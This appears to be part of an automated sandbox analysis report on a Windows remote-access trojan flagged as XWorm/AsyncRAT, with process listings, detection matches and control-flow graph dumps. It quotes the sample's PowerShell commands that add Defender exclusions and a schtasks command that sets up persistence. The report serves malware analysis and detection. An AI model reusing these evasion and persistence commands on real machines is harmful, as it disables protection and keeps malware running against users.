                                                                          Imagebase:0xd30000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:7
                                                                          Start time:12:52:04
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:12:52:04
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:12:52:13
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:12:52:13
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:12:52:22
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:12:52:22
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:14:18:08
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'
                                                                          Imagebase:0x7ff741d30000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:14:18:08
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:14:18:36
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
                                                                          Imagebase:0x7ff748e40000
                                                                          File size:235'008 bytes
                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:14:18:36
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff75da10000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:14:18:37
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\boost
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Roaming\boost
                                                                          Imagebase:0xfd0000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\boost, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\boost, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 82%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:14:18:45
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\OpenWith.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                          Imagebase:0x7ff70e480000
                                                                          File size:123'984 bytes
                                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:14:18:47
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\svchost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                          Imagebase:0x7ff7b4ee0000
                                                                          File size:55'320 bytes
                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:25
                                                                          Start time:14:18:54
                                                                          Start date:14/12/2024
                                                                          Path:C:\Windows\System32\OpenWith.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                          Imagebase:0x7ff70e480000
                                                                          File size:123'984 bytes
                                                                          MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:14:19:01
                                                                          Start date:14/12/2024
                                                                          Path:C:\Users\user\AppData\Roaming\boost
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\AppData\Roaming\boost
                                                                          Imagebase:0xf90000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:CC052D76FFA12621E3A1FAAC9A71AA2A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true


                                                                            Execution Graph

                                                                            Execution Coverage:20.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:6
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 4245 7ffaac5810ca 4246 7ffaac582e80 SetWindowsHookExW 4245->4246 4248 7ffaac582f31 4246->4248 4249 7ffaac58102a 4250 7ffaac582940 RtlSetProcessIsCritical 4249->4250 4252 7ffaac5829f2 4250->4252

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CAO_^
                                                                            • API String ID: 0-3111533842
                                                                            • Opcode ID: b0613be76329969d3f66d87a26c040bd82832ece6994ed4a4860fe9d36708a78
                                                                            • Instruction ID: c6a921aabcb805b1fc5cfebe20fae1995bd51f4f608fce8a586a463db4d3d84d
                                                                            • Opcode Fuzzy Hash: b0613be76329969d3f66d87a26c040bd82832ece6994ed4a4860fe9d36708a78
                                                                            • Instruction Fuzzy Hash: 5142E661B5CA0A4FFB94EB38C459BB9B7D6FF89300F448579E44EC32D2CD28A8058781

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 377 7ffaac580f10-7ffaac580f1c 379 7ffaac580f1e-7ffaac580f51 377->379 380 7ffaac580f52-7ffaac58a8d2 377->380 379->380 386 7ffaac58a8d8-7ffaac58a8e0 380->386 387 7ffaac58ad61-7ffaac58ad73 call 7ffaac58a3c8 380->387 386->387 389 7ffaac58a8e6-7ffaac58a90d 386->389 390 7ffaac58ad78-7ffaac58ad83 387->390 393 7ffaac58a90f-7ffaac58a91d call 7ffaac58a3b8 389->393 395 7ffaac58a922-7ffaac58a946 call 7ffaac58a3b8 393->395 398 7ffaac58a962 395->398 399 7ffaac58a948-7ffaac58a95c call 7ffaac58a3b8 395->399 401 7ffaac58a967-7ffaac58a97e 398->401 399->398 404 7ffaac58a95e-7ffaac58a960 399->404 405 7ffaac58a985-7ffaac58a987 call 7ffaac580f88 401->405 404->401 407 7ffaac58a98c-7ffaac58a99a 405->407 409 7ffaac58a99c-7ffaac58a9a7 407->409 410 7ffaac58a9be-7ffaac58a9cd 407->410 409->410 414 7ffaac58a9a9-7ffaac58a9b4 409->414 413 7ffaac58a9d1-7ffaac58a9dc 410->413 419 7ffaac58aa26-7ffaac58aa2f 413->419 420 7ffaac58a9de-7ffaac58aa24 413->420 417 7ffaac58a9b6-7ffaac58a9bc 414->417 418 7ffaac58aa31-7ffaac58aa3c 414->418 417->413 423 7ffaac58aa8c-7ffaac58aac8 418->423 424 7ffaac58aa3e-7ffaac58aa5a 418->424 419->418 429 7ffaac58aa6c-7ffaac58aa78 420->429 439 7ffaac58aca7-7ffaac58acb2 423->439 427 7ffaac58aa61-7ffaac58aa6a 424->427 427->429 434 7ffaac58aa7a-7ffaac58aa88 429->434 435 7ffaac58aacd-7ffaac58aad9 429->435 434->435 442 7ffaac58aa8a-7ffaac58aa8b 434->442 440 7ffaac58ab29-7ffaac58ab2f 435->440 441 7ffaac58aadb-7ffaac58ab0b 435->441 446 7ffaac58acb4-7ffaac58acca call 7ffaac583370 439->446 447 7ffaac58acd7-7ffaac58ace4 call 7ffaac580f90 439->447 444 7ffaac58ab3e-7ffaac58ab53 440->444 445 7ffaac58ab31-7ffaac58ab39 440->445 462 7ffaac58ab1a-7ffaac58ab26 441->462 463 7ffaac58ab0d-7ffaac58ab15 441->463 442->423 455 7ffaac58ab62-7ffaac58ab77 444->455 456 7ffaac58ab55-7ffaac58ab5d 444->456 445->439 453 7ffaac58accf-7ffaac58acd4 446->453 458 7ffaac58aceb-7ffaac58aced 447->458 453->447 460 7ffaac58ab86-7ffaac58ab9b 455->460 461 7ffaac58ab79-7ffaac58ab81 455->461 456->439 464 7ffaac58ad05-7ffaac58ad57 call 7ffaac580f90 458->464 465 7ffaac58acef-7ffaac58ad03 458->465 469 7ffaac58abaa-7ffaac58abbf 460->469 470 7ffaac58ab9d-7ffaac58aba5 460->470 461->439 462->440 463->439 473 7ffaac58ad58-7ffaac58ad60 call 7ffaac58ad84 464->473 465->473 478 7ffaac58abce-7ffaac58abe3 469->478 479 7ffaac58abc1-7ffaac58abc9 469->479 470->439 473->387 483 7ffaac58abf2-7ffaac58ac07 478->483 484 7ffaac58abe5-7ffaac58abed 478->484 479->439 487 7ffaac58ac16-7ffaac58ac2b 483->487 488 7ffaac58ac09-7ffaac58ac11 483->488 484->439 492 7ffaac58ac37-7ffaac58ac4c 487->492 493 7ffaac58ac2d-7ffaac58ac35 487->493 488->439 495 7ffaac58ac58-7ffaac58ac6d 492->495 496 7ffaac58ac4e-7ffaac58ac56 492->496 493->439 495->439 498 7ffaac58ac6f-7ffaac58ac93 495->498 496->439 501 7ffaac58ac95-7ffaac58ac9d 498->501 502 7ffaac58ac9f-7ffaac58aca0 498->502 501->439 502->439
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59bfbe9d458a38bcedb2de865e15bca45aef7a02ef174f920c461c519a839047
                                                                            • Instruction ID: 7a6b6ee4dec5db2d2e75f3e0bfe27cb8da807845271eeb84e63a24231e8cff50
                                                                            • Opcode Fuzzy Hash: 59bfbe9d458a38bcedb2de865e15bca45aef7a02ef174f920c461c519a839047
                                                                            • Instruction Fuzzy Hash: 70F13761B6DA5B8BFB94AB38884967977D5FF99700F008475E40DE3282DE28FC0697C1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 503 7ffaac587d76-7ffaac587d83 504 7ffaac587d8e-7ffaac587e57 503->504 505 7ffaac587d85-7ffaac587d8d 503->505 509 7ffaac587e59-7ffaac587e62 504->509 510 7ffaac587ec3 504->510 505->504 509->510 512 7ffaac587e64-7ffaac587e70 509->512 511 7ffaac587ec5-7ffaac587eea 510->511 519 7ffaac587eec-7ffaac587ef5 511->519 520 7ffaac587f56 511->520 513 7ffaac587ea9-7ffaac587ec1 512->513 514 7ffaac587e72-7ffaac587e84 512->514 513->511 516 7ffaac587e88-7ffaac587e9b 514->516 517 7ffaac587e86 514->517 516->516 518 7ffaac587e9d-7ffaac587ea5 516->518 517->516 518->513 519->520 521 7ffaac587ef7-7ffaac587f03 519->521 522 7ffaac587f58-7ffaac588000 520->522 523 7ffaac587f3c-7ffaac587f54 521->523 524 7ffaac587f05-7ffaac587f17 521->524 533 7ffaac58806e 522->533 534 7ffaac588002-7ffaac58800c 522->534 523->522 526 7ffaac587f1b-7ffaac587f2e 524->526 527 7ffaac587f19 524->527 526->526 529 7ffaac587f30-7ffaac587f38 526->529 527->526 529->523 535 7ffaac588070-7ffaac588099 533->535 534->533 536 7ffaac58800e-7ffaac58801b 534->536 542 7ffaac588103 535->542 543 7ffaac58809b-7ffaac5880a6 535->543 537 7ffaac58801d-7ffaac58802f 536->537 538 7ffaac588054-7ffaac58806c 536->538 540 7ffaac588031 537->540 541 7ffaac588033-7ffaac588046 537->541 538->535 540->541 541->541 544 7ffaac588048-7ffaac588050 541->544 546 7ffaac588105-7ffaac588196 542->546 543->542 545 7ffaac5880a8-7ffaac5880b6 543->545 544->538 547 7ffaac5880b8-7ffaac5880ca 545->547 548 7ffaac5880ef-7ffaac588101 545->548 554 7ffaac58819c-7ffaac5881ab 546->554 549 7ffaac5880cc 547->549 550 7ffaac5880ce-7ffaac5880e1 547->550 548->546 549->550 550->550 552 7ffaac5880e3-7ffaac5880eb 550->552 552->548 555 7ffaac5881b3-7ffaac588218 call 7ffaac588234 554->555 556 7ffaac5881ad 554->556 563 7ffaac58821a 555->563 564 7ffaac58821f-7ffaac588233 555->564 556->555 563->564
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72f70e89346727c5c136b5cd489bfffdf207ad2b45a8696422fec106c59ddf75
                                                                            • Instruction ID: f7f524ff0b422f040bb1f3112a8d6b03ce25e0b3886449184e2da3bec1f4f40c
                                                                            • Opcode Fuzzy Hash: 72f70e89346727c5c136b5cd489bfffdf207ad2b45a8696422fec106c59ddf75
                                                                            • Instruction Fuzzy Hash: 0CF1A270909A8E8FEBA8DF28C855BF937D1FF55350F04826AE84DC7291CF7499458B82

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 565 7ffaac588b22-7ffaac588b2f 566 7ffaac588b3a-7ffaac588c07 565->566 567 7ffaac588b31-7ffaac588b39 565->567 571 7ffaac588c73 566->571 572 7ffaac588c09-7ffaac588c12 566->572 567->566 574 7ffaac588c75-7ffaac588c9a 571->574 572->571 573 7ffaac588c14-7ffaac588c20 572->573 575 7ffaac588c22-7ffaac588c34 573->575 576 7ffaac588c59-7ffaac588c71 573->576 580 7ffaac588d06 574->580 581 7ffaac588c9c-7ffaac588ca5 574->581 578 7ffaac588c36 575->578 579 7ffaac588c38-7ffaac588c4b 575->579 576->574 578->579 579->579 582 7ffaac588c4d-7ffaac588c55 579->582 584 7ffaac588d08-7ffaac588d2d 580->584 581->580 583 7ffaac588ca7-7ffaac588cb3 581->583 582->576 585 7ffaac588cb5-7ffaac588cc7 583->585 586 7ffaac588cec-7ffaac588d04 583->586 591 7ffaac588d9b 584->591 592 7ffaac588d2f-7ffaac588d39 584->592 587 7ffaac588cc9 585->587 588 7ffaac588ccb-7ffaac588cde 585->588 586->584 587->588 588->588 590 7ffaac588ce0-7ffaac588ce8 588->590 590->586 593 7ffaac588d9d-7ffaac588dcb 591->593 592->591 594 7ffaac588d3b-7ffaac588d48 592->594 601 7ffaac588e3b 593->601 602 7ffaac588dcd-7ffaac588dd8 593->602 595 7ffaac588d4a-7ffaac588d5c 594->595 596 7ffaac588d81-7ffaac588d99 594->596 597 7ffaac588d5e 595->597 598 7ffaac588d60-7ffaac588d73 595->598 596->593 597->598 598->598 600 7ffaac588d75-7ffaac588d7d 598->600 600->596 603 7ffaac588e3d-7ffaac588f15 601->603 602->601 604 7ffaac588dda-7ffaac588de8 602->604 614 7ffaac588f1b-7ffaac588f2a 603->614 605 7ffaac588dea-7ffaac588dfc 604->605 606 7ffaac588e21-7ffaac588e39 604->606 608 7ffaac588dfe 605->608 609 7ffaac588e00-7ffaac588e13 605->609 606->603 608->609 609->609 611 7ffaac588e15-7ffaac588e1d 609->611 611->606 615 7ffaac588f32-7ffaac588f94 call 7ffaac588fb0 614->615 616 7ffaac588f2c 614->616 623 7ffaac588f96 615->623 624 7ffaac588f9b-7ffaac588faf 615->624 616->615 623->624
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d70d13d81f3ae29ad47cd18be36dc3c61c2e736b702966b20ce201f20d7779f
                                                                            • Instruction ID: 4fe29cfde808a58ffacc7a366e5c0e80c399bea56963a66f409fab3f78cc7871
                                                                            • Opcode Fuzzy Hash: 6d70d13d81f3ae29ad47cd18be36dc3c61c2e736b702966b20ce201f20d7779f
                                                                            • Instruction Fuzzy Hash: 5AE1A070909A8E8FEBA8DF28C8557F977D1FF55310F04826AE84DC7291CA74E9458BC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2e4d86a9b1dbee58d7f40e1dddd0795d403178e6ba2feca7d085ea9064062ea0
                                                                            • Instruction ID: 446f3bf20316525e078bf5b8df6d8357efa21797d7db952d7e9ef8acb167408e
                                                                            • Opcode Fuzzy Hash: 2e4d86a9b1dbee58d7f40e1dddd0795d403178e6ba2feca7d085ea9064062ea0
                                                                            • Instruction Fuzzy Hash: 1E512451A5E6C64FE786A73898646767FD8EF97215F1804FBE0CDC7193DD085806C382

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 183 7ffaac58290d-7ffaac5829f0 RtlSetProcessIsCritical 187 7ffaac5829f8-7ffaac582a2d 183->187 188 7ffaac5829f2 183->188 188->187
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: 78e31e1c9cd12faca4928a6484f4e560140c987f8a133e9b54b5b612cb9b8f75
                                                                            • Instruction ID: 7dba1f742e94f7e8fb5f41785a724117aa72e191ce46485b5f262d39f60e1a7a
                                                                            • Opcode Fuzzy Hash: 78e31e1c9cd12faca4928a6484f4e560140c987f8a133e9b54b5b612cb9b8f75
                                                                            • Instruction Fuzzy Hash: 6141C33180C6598FD719DFA8D845BE9BBF0FF56311F04416EE08AD3692CB74A846CB91

                                                                            Control-flow Graph
                                                                            control_flow_graph 190 7ffaac582e58-7ffaac582e5f 191 7ffaac582e61-7ffaac582e69 190->191 192 7ffaac582e6a-7ffaac582edd 190->192 191->192 196 7ffaac582f69-7ffaac582f6d 192->196 197 7ffaac582ee3-7ffaac582ee8 192->197 198 7ffaac582ef2-7ffaac582f2f SetWindowsHookExW 196->198 199 7ffaac582eef-7ffaac582ef0 197->199 200 7ffaac582f31 198->200 201 7ffaac582f37-7ffaac582f68 198->201 199->198 200->201
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: bbf59ffab06388f61f8f6e08a6da50c3eccd98fa84f251c4a5fcf57b19a01538
                                                                            • Instruction ID: 7b0648837373ae188135102adbf1b78cb5f82f26a1e7837bbfd30f9056b0299d
                                                                            • Opcode Fuzzy Hash: bbf59ffab06388f61f8f6e08a6da50c3eccd98fa84f251c4a5fcf57b19a01538
                                                                            • Instruction Fuzzy Hash: 7F31EA7191CA4D4FDB18DB6CD8066F97BE1FB56321F00427ED04DC3292CE64A81687C1

                                                                            Control-flow Graph
                                                                            control_flow_graph 204 7ffaac5810ca-7ffaac582edd 208 7ffaac582f69-7ffaac582f6d 204->208 209 7ffaac582ee3-7ffaac582ee8 204->209 210 7ffaac582ef2-7ffaac582f2f SetWindowsHookExW 208->210 211 7ffaac582eef-7ffaac582ef0 209->211 212 7ffaac582f31 210->212 213 7ffaac582f37-7ffaac582f68 210->213 211->210 212->213
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 33c5ee7261cf506fba3c7dc790af7b9fd7ec8d640c99f0212e6b37233f9f5622
                                                                            • Instruction ID: 3221978a236ed644d32278199616884c6c042ae06c0264afa102b951a0299ac1
                                                                            • Opcode Fuzzy Hash: 33c5ee7261cf506fba3c7dc790af7b9fd7ec8d640c99f0212e6b37233f9f5622
                                                                            • Instruction Fuzzy Hash: 6631E87191C91D9FDB58EB6CD8066F977E1FB69311F10423EE04ED3251CA60A80287C1

                                                                            Control-flow Graph
                                                                            control_flow_graph 216 7ffaac58102a-7ffaac58298a 219 7ffaac582992-7ffaac5829f0 RtlSetProcessIsCritical 216->219 220 7ffaac5829f8-7ffaac582a2d 219->220 221 7ffaac5829f2 219->221 221->220
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2544106729.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffaac580000_aZDwfEKorn.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: a449bb88349d21ed5d78d3ad042654d7d8db9a24b423a6ebe1fb3e581a89a3dd
                                                                            • Instruction ID: e0350c9f8ff136bb9db8f0509bf14e1421ac0d95c121a15cce6bc8c5a20679a3
                                                                            • Opcode Fuzzy Hash: a449bb88349d21ed5d78d3ad042654d7d8db9a24b423a6ebe1fb3e581a89a3dd
                                                                            • Instruction Fuzzy Hash: 4831C27190CA198FDB28DB6CD845BF9BBE0FF55311F14412EE09AD3691CB70A8468B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1368865306.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9fbda57c72e8b786b0fab44badab95e22495f68e2fa1eb83eb2bc15a04a076f
                                                                            • Instruction ID: e911353b92a8acf19266ce455244efc6e0c36d889a8504ed6821b9a06b213f04
                                                                            • Opcode Fuzzy Hash: c9fbda57c72e8b786b0fab44badab95e22495f68e2fa1eb83eb2bc15a04a076f
                                                                            • Instruction Fuzzy Hash: 91D16C30A18A5E8FEF84DF58C455AA97BE1FF69300F14856AE40DD7296CE34E885CBC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.1369218840.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_7ffaac640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 75301391fba6c7245ad1ae600845c02f33769548e0889c404dd14cb720a5b2dc
                                                                            • Instruction ID: e21dbc770f8565ac2d4783349994265abf5fdc580d6965bad3b2bb473c749657
